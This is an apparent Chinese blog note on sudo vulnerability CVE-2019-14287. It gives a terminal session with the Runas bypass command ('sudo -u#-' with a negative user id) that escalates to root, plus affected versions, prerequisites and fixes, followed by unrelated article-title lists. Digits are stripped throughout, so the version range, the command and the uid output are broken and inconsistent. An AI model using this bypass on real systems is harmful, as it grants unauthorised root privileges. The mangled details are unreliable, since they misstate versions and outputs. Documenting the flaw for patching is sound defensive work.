sudo Potential bypass of Runas user restrictions(CVE-2019-14287 )

Date:
2019.10.14

类型：

sudo提权漏洞

影响版本：

sudo < 1.8.


前提：
知道当前用户的密码

当前用户存在于sudo权限列表

root@root-Pc:~$ id

uid=(root) gid=(root) 组=(root),(adm),(cdrom),(sudo),(dip),(plugdev),(lpadmin),(sambashare)

root@root-Pc:~$ sudo -u#- id

[sudo] root 的密码：

uid=(root) gid=(mark) 组=(mark)


修复：

升级sudo版本

修改sudo用户列表

最新文章

1. unity发布安卓 手指控制物体缩放和旋转
2. css对齐
3. JAVA 注解的几大作用及使用方法详解
4. Key Figure中的Aggregation决定了DSO/CUBE转换规则中的Aggregation合计方式
5. 2014 Super Training #10 C Shadow --SPFA/随便搞/DFS
6. Oracle中排序列中值相同引发的问题（译）
7. sql 调用函数的方法
8. Ubuntu 12.04下解决Rhythmbox Music Player乱码问题
9. LED驅動芯片 兩種恒流控制方式
10. Stm32高级定时器(一)
11. JS笔记 入门第三
12. bestcoder44#1002
13. android中怎么把自己须要的app启动图标集中到一个弹出框中
14. 注解式controller开发，action找不到controller？？？
15. 增删改查js
16. python：unittest之discover()方法批量执行用例
17. 【DB2】SQL1585N 由于没有具有兼容页面大小的可用系统临时表空间，因此无法创建临时表。SQLSTATE=54048
18. 函数----基础，参数传递，返回类型和return语句
19. 2.16 C++类与new和delete操作符
20. C#基础知识回顾：2.使用DbProviderFactory实现多数据库访问

热门文章

1. Uva 10054 欧拉回路 打印路径
2. JS获取当前日期和时间的方法,并按照YYYY-MM-DD格式化
3. Python中的十大图像处理工具
4. springcloud 高可用的服务注册中心
5. Groovy assert 断言抛字出来
6. HDU-6546-Function（贪心）
7. docker安装各类软件
8. BZOJ 4399: 魔法少女LJJ 线段树合并 + 对数
9. python2与3自由切换
10. mount -o是什么意思